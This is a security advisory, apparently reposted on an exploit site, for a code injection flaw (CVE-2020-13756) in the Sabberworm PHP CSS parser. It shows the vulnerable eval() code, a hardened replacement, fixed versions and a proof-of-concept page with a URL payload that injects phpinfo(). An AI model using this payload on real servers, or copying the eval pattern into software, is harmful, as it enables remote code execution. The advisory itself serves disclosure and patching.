Sabberworm PHP CSS Code Injection Vulnerability

Published: 03 Jun 2020 | Reported by: Eldar Marcussen | Type: zdt | Source: 0day.today

Sabberworm PHP CSS Code Injection Vulnerability, remote code execution via uncontrolled data in Sabberworm PHP CSS Parse

Sabberworm PHP CSS parser - Code injection
===============================================================================

Identifiers
-------------------------------------------------
* CVE-2020-13756


CVSSv3 score
-------------------------------------------------
8.6 - [AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L](https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L&version=3.1)


Vendor
-------------------------------------------------
Sabberworm - https://github.com/sabberworm/PHP-CSS-Parser


Product
-------------------------------------------------
A Parser for CSS Files written in PHP. Allows extraction of CSS files into
a data structure, manipulation of said structure and output as (optimized)
CSS.


Affected versions
-------------------------------------------------
 - All versions prior to the fixed versions listed below


Credit
-------------------------------------------------
Eldar Marcussen - justanotherhacker.com


Vulnerability summary
-------------------------------------------------
The Sabberworm PHP CSS Parser evaluates uncontrolled data, which may result
in remote code execution if the affected function is called with
attacker-controlled data.


Technical details
-------------------------------------------------
The function `allSelectors` in
`lib/Sabberworm/CSS/CSSList/CSSBlockList.php` on line `64` interpolates
untrusted data inside an `eval()` operation on line `73`.
https://github.com/sabberworm/PHP-CSS-Parser/blob/master/lib/Sabberworm/CSS/CSSList/CSSBlockList.php#L73

The function `allSelectors` is called via the function
`getSelectorsBySpecificity` in `lib/Sabberworm/CSS/CSSList/Document.php`,
the class of the object returned by the `parse()` function in
`lib/Sabberworm/CSS/Parser.php`. If an attacker is able to supply or
influence the content of the data passed to the `allSelectors` or
`getSelectorsBySpecificity` functions, the server will execute
attacker-controlled code.

```php
protected function allSelectors(&$aResult, $sSpecificitySearch = null) {
    $aDeclarationBlocks = array();
    $this->allDeclarationBlocks($aDeclarationBlocks);
    foreach ($aDeclarationBlocks as $oBlock) {
        foreach ($oBlock->getSelectors() as $oSelector) {
            if ($sSpecificitySearch === null) {
                $aResult[] = $oSelector;
            } else {
                // $sSpecificitySearch is interpolated into PHP source and evaluated
                $sComparison = "\$bRes = {$oSelector->getSpecificity()} $sSpecificitySearch;";
                eval($sComparison);
                if ($bRes) {
                    $aResult[] = $oSelector;
                }
            }
        }
    }
}
```
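
A hardened form of the comparison above, as an added example that is not the project's code or its actual patch: the search string is parsed into an allowlisted operator and an integer, and anything else is rejected instead of evaluated. The helper name `specificityMatches` and the sample inputs are assumptions made for illustration.

```php
<?php
// Added example, not the project's code or patch.

/**
 * Hypothetical helper: compare a selector's specificity against a search
 * string such as "100" or "> 100" without evaluating the string as PHP.
 */
function specificityMatches(int $iSpecificity, string $sSearch): bool
{
    // Anchored allowlist: optional comparison operator, then digits only.
    $sPattern = '/\A\s*(===?|!==?|<=|>=|<|>)?\s*(\d{1,9})\s*\z/';
    if (!preg_match($sPattern, $sSearch, $aMatch)) {
        throw new InvalidArgumentException('Invalid specificity search');
    }
    $sOperator = $aMatch[1] === '' ? '==' : $aMatch[1];
    $iTarget = (int) $aMatch[2];

    switch ($sOperator) {
        case '<':
            return $iSpecificity < $iTarget;
        case '<=':
            return $iSpecificity <= $iTarget;
        case '>':
            return $iSpecificity > $iTarget;
        case '>=':
            return $iSpecificity >= $iTarget;
        case '!=':
        case '!==':
            return $iSpecificity !== $iTarget;
        default: // '==' or '==='
            return $iSpecificity === $iTarget;
    }
}

// Constructed inputs: two well-formed searches and one string carrying a
// trailing statement, the shape used in this advisory's proof of concept.
foreach (['> 100', '100', '> 100;phpinfo()'] as $sSearch) {
    try {
        $sResult = var_export(specificityMatches(110, $sSearch), true);
    } catch (InvalidArgumentException $e) {
        $sResult = 'rejected';
    }
    echo $sSearch, ' => ', $sResult, PHP_EOL;
}
```

The pattern is anchored with `\A` and `\z` so that a trailing newline or any extra token fails validation rather than being silently ignored.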


Proof of concept
-------------------------------------------------
The following evidence is provided to illustrate the existence and
exploitation of this vulnerability:

Save the following code as csspwn.php
```php
<?php
use Sabberworm\CSS\Parser;

$css = "#test .help,\n#file,\n.help:hover,\nli.green,\nol li::before {\n   font-family: Helvetica;\n}";

$oCssParser = new Sabberworm\CSS\Parser($css);
$oDoc = $oCssParser->parse();
$oDoc->getSelectorsBySpecificity('> '.$_GET['n']);
?>
```
Serve the page via `php -S 0:8888` then open the following URL:
http://localhost:8888/csspwn.php?n=100;phpinfo()

Solution
-------------------------------------------------
Upgrade to one of the following versions:
  1.0.1
  2.0.1
  3.0.1
  4.0.1
  5.0.9
  5.1.3
  5.2.1
  6.0.2
  7.0.4
  8.0.1
  8.1.1
  8.2.1
  8.3.1

Timeline
-------------------------------------------------
Date        | Status
------------|---------------------
01-JUN-2020 | Reported to vendor
01-JUN-2020 | Patch available
02-JUN-2020 | Public disclosure

#  0day.today [2020-07-19]  #
